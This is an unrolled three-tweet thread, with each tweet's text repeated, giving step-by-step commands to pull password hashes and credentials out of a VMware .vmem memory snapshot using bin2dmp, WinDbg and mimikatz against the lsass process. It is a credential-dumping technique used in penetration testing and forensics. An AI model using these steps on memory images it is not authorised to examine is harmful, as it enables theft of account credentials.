,
3 tweets,
2 min read
Read on Twitter
(1/3) EXTRACT HASHES FROM VMWARE .vmem FILE:
STEP 1: Install WinDbg & bin2dmp.exe:
docs.microsoft.com/en-us/windows-…
github.com/arizvisa/windo…
STEP 2: Download mimikatz:
github.com/gentilkiwi/mim…
STEP 3: Convert your “.vmem” file into a dump file:
bin2dmp.exe “SVR2012r2-1.vmem” vmware.dmp
STEP 1: Install WinDbg & bin2dmp.exe:
docs.microsoft.com/en-us/windows-…
github.com/arizvisa/windo…
STEP 2: Download mimikatz:
github.com/gentilkiwi/mim…
STEP 3: Convert your “.vmem” file into a dump file:
bin2dmp.exe “SVR2012r2-1.vmem” vmware.dmp
(2/3) EXTRACT HASHES FROM VMWARE .vmem FILE:
STEP 4: Start WinDbg and “File -> Open Crash Dump” your “vmware.dmp” file
STEP 5: Load correct mimikatz bitness (x86/x64) library ‘mimilib.dll’:
kd> .load mimilib.dll
STEP 6: Find lsass process in dump:
kd> !process 0 0 lsass.exe
STEP 4: Start WinDbg and “File -> Open Crash Dump” your “vmware.dmp” file
STEP 5: Load correct mimikatz bitness (x86/x64) library ‘mimilib.dll’:
kd> .load mimilib.dll
STEP 6: Find lsass process in dump:
kd> !process 0 0 lsass.exe
(3/3) EXTRACT HASHES FROM VMWARE .vmem FILE:
STEP 7: Read process correct memory location
(Example PROCESS fffffa800e0b3b30)
kd> .process /r /p fffffa800e0b3b30
STEP 8: Launch mimikatz in process to dump in-memory hashes and credentials:
kd> !mimikatz
amzn.com/dp/1793458618
STEP 7: Read process correct memory location
(Example PROCESS fffffa800e0b3b30)
kd> .process /r /p fffffa800e0b3b30
STEP 8: Launch mimikatz in process to dump in-memory hashes and credentials:
kd> !mimikatz
amzn.com/dp/1793458618
